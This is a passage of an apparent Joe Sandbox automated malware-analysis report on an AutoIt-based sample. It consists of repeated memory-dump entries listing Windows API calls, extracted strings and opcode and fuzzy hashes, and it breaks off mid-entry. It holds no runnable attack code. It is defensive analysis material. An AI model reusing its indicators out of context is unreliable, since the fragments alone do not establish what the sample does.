                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2889604237-0
                                                                                                                • Opcode ID: 3263b80ef88ec0b3504cd1438ed37392a8eb02cf7c63056df33be6c591a4f51c
                                                                                                                • Instruction ID: ef9c685a4397ebe3520f11930c530e3104ac2606ae8ae95fc6671cabaeba3b69
                                                                                                                • Opcode Fuzzy Hash: 3263b80ef88ec0b3504cd1438ed37392a8eb02cf7c63056df33be6c591a4f51c
                                                                                                                • Instruction Fuzzy Hash: 5BE04FB5500204EFDB005FB0C84C6AE7BB8FB6C350F11C80AFC5A8B250DB789845AB64
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2889604237-0
                                                                                                                • Opcode ID: 4d65e1b6381db507bad7779d1f8d34d70e3c4eadb6d30ebf91e69dd4afae1f78
                                                                                                                • Instruction ID: 1b913d232eb7739e1d24592656049adb6d81d3d9133c94ee3dd0367b2e2eb4d0
                                                                                                                • Opcode Fuzzy Hash: 4d65e1b6381db507bad7779d1f8d34d70e3c4eadb6d30ebf91e69dd4afae1f78
                                                                                                                • Instruction Fuzzy Hash: AAE046B5500200EFDB005FB0C84C6AD7BB8EB6C360F11C80AF95A8B220DBB89805AB24
                                                                                                                APIs
                                                                                                                • OleSetContainedObject.OLE32(?,00000001), ref: 004CDEAA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ContainedObject
                                                                                                                • String ID: AutoIt3GUI$Container
                                                                                                                • API String ID: 3565006973-3941886329
                                                                                                                • Opcode ID: 835a434f9f068afb0282589b132fc213ec9a37d15df4aeaa2266feb358450761
                                                                                                                • Instruction ID: a4956ad926733efe90c95a795a6333a0b094fbef248cafc17cb3996732001fb6
                                                                                                                • Opcode Fuzzy Hash: 835a434f9f068afb0282589b132fc213ec9a37d15df4aeaa2266feb358450761
                                                                                                                • Instruction Fuzzy Hash: A3913578A00601AFDB54DF64C884F6ABBF9BF49714F10846EF84ACB691DB74E841CB64
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscpy
                                                                                                                • String ID: I/P$I/P
                                                                                                                • API String ID: 3048848545-2876928067
                                                                                                                • Opcode ID: 216820cd40ab9a3a1cd61449237ac12a5d4ff903a3d3ad20296fe9ad0a067895
                                                                                                                • Instruction ID: 46f78b7310cf93d017986972bf6c7791ea7cd3d6de973e34ddde50f35ef6a36c
                                                                                                                • Opcode Fuzzy Hash: 216820cd40ab9a3a1cd61449237ac12a5d4ff903a3d3ad20296fe9ad0a067895
                                                                                                                • Instruction Fuzzy Hash: 6D412C71A00116AACF25DF99D1719FEBBB0EF28314F50405FE88167391D7B85E82C768
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(00000000), ref: 004ABCDA
                                                                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 004ABCF3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalMemorySleepStatus
                                                                                                                • String ID: @
                                                                                                                • API String ID: 2783356886-2766056989
                                                                                                                • Opcode ID: f9ccf60fc9620635e83679c31a814f0f2a66aef07612b1871ad99e780b2c979b
                                                                                                                • Instruction ID: b4561e68c226ed96853209fab9a17befba5be9f28df0806a179c30b3b08dab56
                                                                                                                • Opcode Fuzzy Hash: f9ccf60fc9620635e83679c31a814f0f2a66aef07612b1871ad99e780b2c979b
                                                                                                                • Instruction Fuzzy Hash: 4B515871408744ABE320AF55D885BAFBBECFBA6358F41484EF1C8410A2EF7484ACD756
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004944ED: __fread_nolock.LIBCMT ref: 0049450B
                                                                                                                • _wcscmp.LIBCMT ref: 004DC65D
                                                                                                                • _wcscmp.LIBCMT ref: 004DC670
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscmp$__fread_nolock
                                                                                                                • String ID: FILE
                                                                                                                • API String ID: 4029003684-3121273764
                                                                                                                • Opcode ID: 8a22c1595753dc4f549f9227f28641e0b25be65dfe7a210a5ad6da63411298fa
                                                                                                                • Instruction ID: ca42ff112a06db1bf3f7e300748f086fbf239282530aba875074de552fe6c9f3
                                                                                                                • Opcode Fuzzy Hash: 8a22c1595753dc4f549f9227f28641e0b25be65dfe7a210a5ad6da63411298fa
                                                                                                                • Instruction Fuzzy Hash: FA41D772A0020ABADF109AA5DC95FDF7BB99F89718F00047BF601E6281D6789A05C755
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004FA85A
                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004FA86F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: '
                                                                                                                • API String ID: 3850602802-1997036262
                                                                                                                • Opcode ID: 123c6551c3550e774d175675c5a908f189dbc0dee2eca45dc3f821f3fb375ca8
                                                                                                                • Instruction ID: 24089d59eb90f08652923db3ee17df28f0d3459467962e6ce8a87075399789fe
                                                                                                                • Opcode Fuzzy Hash: 123c6551c3550e774d175675c5a908f189dbc0dee2eca45dc3f821f3fb375ca8
                                                                                                                • Instruction Fuzzy Hash: 41410BB4E003099FDB14DF64C880BEA7BF5FB08344F14006AEA09AB341D774A956CFA5
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(?,?,?,?), ref: 004F980E
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 004F984A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$DestroyMove
                                                                                                                • String ID: static
                                                                                                                • API String ID: 2139405536-2160076837
                                                                                                                • Opcode ID: b539225e5d1936fa34bcec89b8f65917dcc2676c029dc66778dd2c78d1348573
                                                                                                                • Instruction ID: 46c2b2bdca605ae01a37272569ac5489f4b3125ea4caa0979c178e74d5449a4c
                                                                                                                • Opcode Fuzzy Hash: b539225e5d1936fa34bcec89b8f65917dcc2676c029dc66778dd2c78d1348573
                                                                                                                • Instruction Fuzzy Hash: E1319071110608AADB10AF75CC80BFB77B9FF59764F00861EF9A9C7150DA34AC81D768
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 004D51C6
                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 004D5201
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoItemMenu_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 2223754486-4108050209
                                                                                                                • Opcode ID: 7226338c9884845e0c926f72a0808b8b3b39c2cd736a912df16cf5d74ae37bab
                                                                                                                • Instruction ID: 8ec351ac888db266b1158002a46b13c9112329a1c49611ab801561a715de86d8
                                                                                                                • Opcode Fuzzy Hash: 7226338c9884845e0c926f72a0808b8b3b39c2cd736a912df16cf5d74ae37bab
                                                                                                                • Instruction Fuzzy Hash: E531F531A007049BEB24CF99D859B9FBBF4EF45350F14005FE981A63A0DB789A48CF19
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __snwprintf
                                                                                                                • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                • API String ID: 2391506597-2584243854
                                                                                                                • Opcode ID: 70713a01a7a9c2109e30d6b329c34e137cc8d327d39182a5a2e8132640ac1abf
                                                                                                                • Instruction ID: e92534df5b2d198586f45e7c75ce3f5172a0bd0adddf14c3ae553049315d9c69
                                                                                                                • Opcode Fuzzy Hash: 70713a01a7a9c2109e30d6b329c34e137cc8d327d39182a5a2e8132640ac1abf
                                                                                                                • Instruction Fuzzy Hash: EC21C531A00114AFCF11EF66C882EED7BB4BF55348F11046EF505AB151DB78EA05CBA9
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004F945C
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004F9467
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: Combobox
                                                                                                                • API String ID: 3850602802-2096851135
                                                                                                                • Opcode ID: f1f9f2bb95fd6bab1f9439854b0e92e071874e7c339d601d806a553199679166
                                                                                                                • Instruction ID: 71d69fd2d9adf2ae0892e7651ca986107ee82da9c1563349bb84f266d3fe7d60
                                                                                                                • Opcode Fuzzy Hash: f1f9f2bb95fd6bab1f9439854b0e92e071874e7c339d601d806a553199679166
                                                                                                                • Instruction Fuzzy Hash: 8711B67130020D6FEF119F55DC80FBB376EEB583A4F104126FA15972A0D6359C528B64
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F
                                                                                                                • GetActiveWindow.USER32 ref: 004FDA7B
                                                                                                                • EnumChildWindows.USER32(?,004FD75F,00000000), ref: 004FDAF5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ActiveChildEnumLongWindows
                                                                                                                • String ID: T1N
                                                                                                                • API String ID: 3814560230-3285005403
                                                                                                                • Opcode ID: c99813124ed5e2887ae036f40c8fec93148f58ac7c5fd50f176b46b299a7ac1d
                                                                                                                • Instruction ID: 576e1ca7f4ca646cbf871b246089a2f2a6e29d5dcbcd095d2a10cab01b4a620c
                                                                                                                • Opcode Fuzzy Hash: c99813124ed5e2887ae036f40c8fec93148f58ac7c5fd50f176b46b299a7ac1d
                                                                                                                • Instruction Fuzzy Hash: 31216D35A04704DFC715DF28D860AA67BF6FF69321F25061EE966873E0D734A804DB68
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004AD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004AD1BA
                                                                                                                  • Part of subcall function 004AD17C: GetStockObject.GDI32(00000011), ref: 004AD1CE
                                                                                                                  • Part of subcall function 004AD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 004AD1D8
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004F9968
                                                                                                                • GetSysColor.USER32(00000012), ref: 004F9982
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                • String ID: static
                                                                                                                • API String ID: 1983116058-2160076837
                                                                                                                • Opcode ID: 1c82878df65edb6d109481ba123180db8275483abf5d005c3f10185b26d788e9
                                                                                                                • Instruction ID: 35d6a05eb1fc95a0773a89f841d0d877ec3c2afcb2b4ebd16f1d9550050a5020
                                                                                                                • Opcode Fuzzy Hash: 1c82878df65edb6d109481ba123180db8275483abf5d005c3f10185b26d788e9
                                                                                                                • Instruction Fuzzy Hash: 9B1117B2510209AFDB05DFB8CC45EFA7BA8FB08344F014619FA55E2250E678E851DB64
                                                                                                                APIs
                                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 004F9699
                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004F96A8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LengthMessageSendTextWindow
                                                                                                                • String ID: edit
                                                                                                                • API String ID: 2978978980-2167791130
                                                                                                                • Opcode ID: 31a9505ea4e5a46dfef92a453d00c8695f7831a260f3454be786338593371a3e
                                                                                                                • Instruction ID: 4574b60b838fa89e0ce3570e36cd3910583ca7ae0e0b8f39dc978beba4f45c2f
                                                                                                                • Opcode Fuzzy Hash: 31a9505ea4e5a46dfef92a453d00c8695f7831a260f3454be786338593371a3e
                                                                                                                • Instruction Fuzzy Hash: 22116A71500208AAFF115F64DC40FFB3B6AEB153A8F104316FA65D72E0C7399C51AB68
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 004D52D5
                                                                                                                • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 004D52F4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoItemMenu_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 2223754486-4108050209
                                                                                                                • Opcode ID: 40fc164165d2a17467224c9ebf1bdcd189317f7e9569be46e9c74afe074ca6b1
                                                                                                                • Instruction ID: d2602f0a5bb252bcccd2d369f19f0e639ce460ad62ddcb9daf08722911c5f4be
                                                                                                                • Opcode Fuzzy Hash: 40fc164165d2a17467224c9ebf1bdcd189317f7e9569be46e9c74afe074ca6b1
                                                                                                                • Instruction Fuzzy Hash: CB112632A00714ABDB20DF9CC921B9E7BB8AB05390F040017EC11E7390DBB4ED09CBA9
                                                                                                                APIs
                                                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004E4DF5
                                                                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 004E4E1E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
